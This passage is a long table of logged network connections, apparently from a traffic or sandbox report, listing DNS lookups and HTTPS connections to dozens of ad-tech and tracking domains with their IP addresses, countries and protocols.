| NL | 35.214.137.8:443 | csync.loopme.me | tcp |
| US | 8.8.8.8:53 | sync-gdpr.intentiq.com | udp |
| US | 8.8.8.8:53 | rtb.primis.tech | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| GB | 2.23.220.28:443 | cs.media.net | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | tcp |
| US | 52.5.23.136:443 | mb9eo.publishers.tremorhub.com | tcp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| DE | 18.64.79.115:443 | sync-gdpr.intentiq.com | tcp |
| DE | 18.64.79.115:443 | sync-gdpr.intentiq.com | tcp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| US | 35.244.159.8:443 | u.openx.net | udp |
| NL | 35.214.136.108:443 | x.bidswitch.net | udp |
| US | 104.18.36.155:443 | ssum-sec.casalemedia.com | udp |
| GB | 18.172.89.123:443 | rtb.primis.tech | tcp |
| US | 8.8.8.8:53 | ads.betweendigital.com | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| US | 8.8.8.8:53 | 84.192.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.36.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.79.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.21.192.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.54.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.194.5.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.27.211.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.252.227.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.168.78.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.171.252.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.243.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.95.64.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.195.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.187.202.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.39.160.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.103.64.18.in-addr.arpa | udp |
| NL | 188.42.196.115:443 | ads.betweendigital.com | tcp |
| US | 8.8.8.8:53 | 144.224.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.204.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.136.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.193.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.114.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.220.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.137.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.208.232.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.111.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 80.77.87.163:443 | cs.admanmedia.com | tcp |
| DE | 18.64.79.115:443 | sync-gdpr.intentiq.com | tcp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| NL | 81.17.55.123:443 | ssbsync-global.smartadserver.com | tcp |
| US | 8.8.8.8:53 | cm.adform.net | udp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| DK | 37.157.4.28:443 | cm.adform.net | tcp |
| US | 80.77.87.163:443 | cs.admanmedia.com | tcp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| GB | 142.250.179.225:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| DE | 51.89.9.254:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| DE | 3.160.39.118:443 | s.ad.smaato.net | tcp |
| DE | 18.184.119.72:443 | match.sharethrough.com | tcp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 8.8.8.8:53 | trace-eu.mediago.io | udp |
| NL | 35.214.168.80:443 | trace-eu.mediago.io | tcp |
| US | 64.202.112.95:443 | b1sync.zemanta.com | tcp |
| US | 8.8.8.8:53 | sync.connectad.io | udp |
| US | 172.67.8.174:443 | sync.connectad.io | tcp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| DE | 37.252.171.52:443 | ib.adnxs.com | tcp |
| IE | 52.211.27.144:443 | ap.lijit.com | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| DK | 37.157.4.28:443 | cm.adform.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 172.67.8.174:443 | sync.connectad.io | udp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | sync.kueezrtb.com | udp |
| US | 8.8.8.8:53 | sync.ingage.tech | udp |
| US | 8.8.8.8:53 | video.primis.tech | udp |
| US | 8.8.8.8:53 | gw-iad-bid.ymmobi.com | udp |
| US | 3.165.148.55:443 | video.primis.tech | tcp |
| US | 3.165.148.55:443 | video.primis.tech | tcp |
| US | 54.225.96.125:443 | sync.ingage.tech | tcp |
| US | 47.253.61.56:443 | gw-iad-bid.ymmobi.com | tcp |
| US | 23.192.21.141:443 | eus.rubiconproject.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 134.122.16.152:443 | sync.kueezrtb.com | tcp |
| US | 8.8.8.8:53 | 115.79.64.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.23.5.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.158.57.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.55.17.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.4.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.9.89.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.39.160.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.119.184.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.168.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.112.202.64.in-addr.arpa | udp |
| US | 3.165.148.55:443 | video.primis.tech | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | ced-ns.sascdn.com | udp |
| US | 8.8.8.8:53 | eu-u.openx.net | udp |
| US | 80.77.87.163:443 | cs.admanmedia.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| GB | 142.250.180.2:443 | cm.g.doubleclick.net | tcp |
| GB | 142.250.180.2:443 | cm.g.doubleclick.net | tcp |
| GB | 2.19.117.35:443 | ced-ns.sascdn.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | api.rlcdn.com | udp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | udp |
| US | 34.120.133.55:443 | api.rlcdn.com | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | euw2.smartadserver.com | udp |
| US | 8.8.8.8:53 | us-u.openx.net | udp |
| US | 8.8.8.8:53 | sync.targeting.unrulymedia.com | udp |
| GB | 2.19.117.32:443 | apps.sascdn.com | tcp |
| GB | 2.19.117.32:443 | apps.sascdn.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| GB | 142.250.180.2:443 | cm.g.doubleclick.net | udp |
| DE | 162.19.138.116:443 | lb.eu-1-id5-sync.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | ad.yieldlab.net | udp |
| US | 8.8.8.8:53 | ad.sxp.smartclip.net | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 2.23.204.119:443 | ad.yieldlab.net | tcp |
| GB | 2.23.204.119:443 | ad.yieldlab.net | tcp |
| US | 35.186.194.101:443 | ad.sxp.smartclip.net | tcp |
| US | 35.186.194.101:443 | ad.sxp.smartclip.net | tcp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| DE | 162.19.138.116:443 | lb.eu-1-id5-sync.com | tcp |
| US | 35.186.194.101:443 | ad.sxp.smartclip.net | udp |
| US | 8.8.8.8:53 | fw.adsafeprotected.com | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | udp |
| US | 54.152.32.181:443 | fw.adsafeprotected.com | tcp |
| US | 54.152.32.181:443 | fw.adsafeprotected.com | tcp |
| GB | 172.217.16.230:443 | s0.2mdn.net | tcp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| US | 8.8.8.8:53 | sync.inmobi.com | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.148.165.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.192.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.16.122.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.61.253.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.96.225.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.133.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.204.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.194.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.230:443 | s0.2mdn.net | tcp |
| US | 8.8.8.8:53 | googleads4.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 181.32.152.54.in-addr.arpa | udp |
| NL | 89.149.192.196:443 | ssbsync.smartadserver.com | tcp |
| US | 20.33.55.12:443 | sync.inmobi.com | tcp |
| GB | 142.250.179.226:443 | googleads4.g.doubleclick.net | tcp |
| GB | 142.250.179.226:443 | googleads4.g.doubleclick.net | tcp |
| US | 35.227.252.103:443 | rtb.openx.net | tcp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| IE | 3.248.152.233:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | dsp.nrich.ai | udp |
| DE | 91.228.74.200:443 | cms.quantserve.com | tcp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| DE | 91.228.74.200:443 | cms.quantserve.com | tcp |
| FR | 51.255.68.171:443 | dsp.nrich.ai | tcp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | simage2.pubmatic.com | udp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| US | 35.227.252.103:443 | rtb.openx.net | udp |
| US | 3.210.226.4:443 | sync.srv.stackadapt.com | tcp |
| US | 8.8.8.8:53 | dsp.360yield.com | udp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| DE | 80.82.210.217:443 | dsp-cookie.adfarm1.adition.com | tcp |
| US | 8.8.8.8:53 | dsp-ap.eskimi.com | udp |
| US | 8.8.8.8:53 | ox-rtb-europe-west2.openx.net | udp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| IE | 34.254.235.237:443 | dsp.360yield.com | tcp |
| NL | 188.42.63.48:443 | dsp-ap.eskimi.com | tcp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | tcp |
| NL | 198.47.127.205:443 | image2.pubmatic.com | tcp |
| NL | 198.47.127.205:443 | image2.pubmatic.com | tcp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cs.lkqd.net | udp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | tcp |
| US | 8.8.8.8:53 | ad.mrtnsvr.com | udp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 8.8.8.8:53 | static.adsafeprotected.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 8.8.8.8:53 | p.rfihub.com | udp |
| IE | 54.155.111.174:443 | match.prod.bidr.io | tcp |
| NL | 35.214.137.8:443 | csync.loopme.me | tcp |
| GB | 18.172.89.95:443 | static.adsafeprotected.com | tcp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 8.8.8.8:53 | sea-u.openx.net | udp |
| GB | 172.217.16.230:443 | s0.2mdn.net | udp |
| GB | 142.250.179.226:443 | googleads4.g.doubleclick.net | udp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| US | 3.210.226.4:443 | sync.srv.stackadapt.com | tcp |
| IE | 54.155.111.174:443 | match.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | tr.blismedia.com | udp |
| US | 8.8.8.8:53 | openx2-match.dotomi.com | udp |
| US | 8.8.8.8:53 | d5p.de17a.com | udp |
| US | 8.8.8.8:53 | ipac.ctnsnet.com | udp |
| US | 34.96.105.8:443 | tr.blismedia.com | tcp |
| NL | 89.207.16.140:443 | openx2-match.dotomi.com | tcp |
| GB | 18.172.89.123:443 | rtb.primis.tech | udp |
| US | 8.8.8.8:53 | pixel.onaudience.com | udp |
| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
| US | 8.8.8.8:53 | mwzeom.zeotap.com | udp |
| US | 35.186.193.173:443 | ipac.ctnsnet.com | tcp |
| SE | 13.53.196.230:443 | d5p.de17a.com | tcp |
| FR | 54.38.113.8:443 | pixel.onaudience.com | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| US | 104.22.50.98:443 | mwzeom.zeotap.com | tcp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 104.18.36.155:443 | dsum-sec.casalemedia.com | tcp |
| US | 104.18.36.155:443 | dsum-sec.casalemedia.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| US | 8.8.8.8:53 | dt.adsafeprotected.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 104.18.36.155:443 | dsum-sec.casalemedia.com | udp |
| US | 54.186.83.187:443 | dt.adsafeprotected.com | tcp |
| US | 54.186.83.187:443 | dt.adsafeprotected.com | tcp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| GB | 87.248.114.11:443 | ups.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | pubmatic-match.dotomi.com | udp |
| US | 8.8.8.8:53 | match.adsby.bidtheatre.com | udp |
| US | 8.8.8.8:53 | ad.turn.com | udp |
| NL | 35.204.158.49:443 | um.simpli.fi | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| US | 8.8.8.8:53 | rtb-csync.smartadserver.com | udp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| NL | 188.166.17.21:443 | match.adsby.bidtheatre.com | tcp |
| NL | 89.207.16.201:443 | pubmatic-match.dotomi.com | tcp |
| US | 54.186.83.187:443 | dt.adsafeprotected.com | tcp |
| US | 8.8.8.8:53 | amazon-tam-match.dotomi.com | udp |
| NL | 89.149.193.105:443 | rtb-csync.smartadserver.com | tcp |
| US | 54.186.83.187:443 | dt.adsafeprotected.com | tcp |
| NL | 89.149.193.105:443 | rtb-csync.smartadserver.com | tcp |
| US | 54.186.83.187:443 | dt.adsafeprotected.com | tcp |
| NL | 89.207.16.137:443 | amazon-tam-match.dotomi.com | tcp |
| US | 8.8.8.8:53 | 196.192.149.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.152.248.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.55.33.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.68.255.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.191.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.210.82.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.143.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.63.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.226.210.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.199.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.235.254.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.163.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.111.155.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.89.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.105.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.193.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.196.53.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.50.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.113.38.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.51.243.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.216.36.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.158.204.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.17.166.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.228.46.in-addr.arpa | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | image4.pubmatic.com | udp |
| NL | 198.47.127.20:443 | image4.pubmatic.com | tcp |
| US | 54.186.83.187:443 | dt.adsafeprotected.com | tcp |
| DE | 3.120.214.218:443 | ps.eyeota.net | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| DE | 18.184.119.72:443 | match.sharethrough.com | tcp |
| US | 98.82.156.207:443 | s.amazon-adsystem.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | ce.lijit.com | udp |
| IE | 34.250.71.26:443 | ce.lijit.com | tcp |
| US | 8.8.8.8:53 | d.turn.com | udp |
| NL | 46.228.164.13:443 | d.turn.com | tcp |
| US | 8.8.8.8:53 | code.createjs.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| GB | 2.19.117.35:443 | ced-ns.sascdn.com | tcp |
| US | 8.8.8.8:53 | token.rubiconproject.com | udp |
| NL | 69.173.156.149:443 | token.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | token.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.com | udp |
| US | 8.8.8.8:53 | 105.193.149.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.83.186.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.214.120.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.156.82.98.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.71.250.34.in-addr.arpa | udp |
| NL | 69.173.156.149:443 | pixel-eu.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | pixel-eu.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | pixel-eu.rubiconproject.com | tcp |
| GB | 2.19.117.95:443 | code.createjs.com | tcp |
| US | 8.8.8.8:53 | 20.127.47.198.in-addr.arpa | udp |
| GB | 172.217.16.230:443 | s0.2mdn.net | udp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | pixel-eu.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | 13.164.228.46.in-addr.arpa | udp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | pixel.tapad.com | udp |
| GB | 172.217.16.230:443 | s0.2mdn.net | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 8.8.8.8:53 | pulsepoint-match.dotomi.com | udp |
| US | 98.82.156.207:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | aorta.clickagy.com | udp |
| US | 8.8.8.8:53 | 62.113.111.34.in-addr.arpa | udp |
| US | 98.82.156.207:443 | s.amazon-adsystem.com | tcp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | pool.admedo.com | udp |
| DE | 18.184.119.72:443 | match.sharethrough.com | tcp |
| GB | 142.250.179.226:443 | googleads4.g.doubleclick.net | tcp |
| US | 100.29.20.208:443 | aorta.clickagy.com | tcp |
| FR | 163.5.194.36:443 | prebid.a-mo.net | tcp |
| GB | 142.250.179.226:443 | googleads4.g.doubleclick.net | tcp |
| BE | 35.206.140.87:443 | pool.admedo.com | tcp |
| US | 8.8.8.8:53 | capi.connatix.com | udp |
| US | 172.64.146.152:443 | capi.connatix.com | tcp |
| US | 3.165.148.55:443 | video.primis.tech | udp |
| BE | 35.206.140.87:443 | pool.admedo.com | udp |
| GB | 216.58.212.226:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | simage4.pubmatic.com | udp |
| GB | 185.64.190.81:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 14.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.140.206.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.146.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.20.29.100.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | core.iprom.net | udp |
| US | 8.8.8.8:53 | cm-supply-web.gammaplatform.com | udp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | cm.adgrx.com | udp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | matching.truffle.bid | udp |
| IE | 52.215.155.11:443 | cm.adgrx.com | tcp |
| FR | 141.95.171.141:443 | green.erne.co | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| US | 172.64.150.63:443 | a.tribalfusion.com | tcp |
| IE | 54.74.74.210:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | pixel-eu.onaudience.com | udp |
| FR | 54.38.113.4:443 | pixel-eu.onaudience.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | loada.exelator.com | udp |
| IE | 54.78.254.47:443 | loada.exelator.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | 20.165.5.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.150.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.155.215.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.171.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.120.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.74.74.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.113.38.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.254.78.54.in-addr.arpa | udp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | ib.adnxs-simple.com | udp |
| NL | 185.89.210.244:443 | ib.adnxs-simple.com | tcp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| GB | 142.250.178.10:443 | imasdk.googleapis.com | tcp |
| US | 35.227.252.103:443 | rtb.openx.net | udp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| US | 104.22.54.206:443 | sync.connectad.io | udp |
| US | 8.8.8.8:53 | 244.210.89.185.in-addr.arpa | udp |
| GB | 142.250.178.10:443 | imasdk.googleapis.com | tcp |
| GB | 172.217.16.230:443 | s0.2mdn.net | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 216.239.32.3:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | 3.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync.teads.tv | udp |
| GB | 2.17.149.102:443 | sync.teads.tv | tcp |
| US | 216.239.32.3:443 | csi.gstatic.com | udp |
| GB | 2.17.149.102:443 | sync.teads.tv | tcp |
| US | 8.8.8.8:53 | 102.149.17.2.in-addr.arpa | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 087a2a0f08bb550392d0b72240a7d2f5.safeframe.googlesyndication.com | udp |
| GB | 142.250.179.226:443 | googleads4.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | video.seenthis.se | udp |
| US | 8.8.8.8:53 | t.seenthis.se | udp |
| US | 151.101.1.91:443 | t.seenthis.se | tcp |
| US | 151.101.65.91:443 | t.seenthis.se | tcp |
| US | 151.101.65.91:443 | t.seenthis.se | tcp |
| US | 151.101.1.91:443 | t.seenthis.se | udp |
| US | 151.101.1.91:443 | t.seenthis.se | udp |
| US | 151.101.65.91:443 | t.seenthis.se | udp |
| US | 8.8.8.8:53 | 91.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.101.151.in-addr.arpa | udp |
| DE | 37.252.171.52:443 | ib.adnxs.com | tcp |
| FR | 51.178.195.208:443 | euw2.smartadserver.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
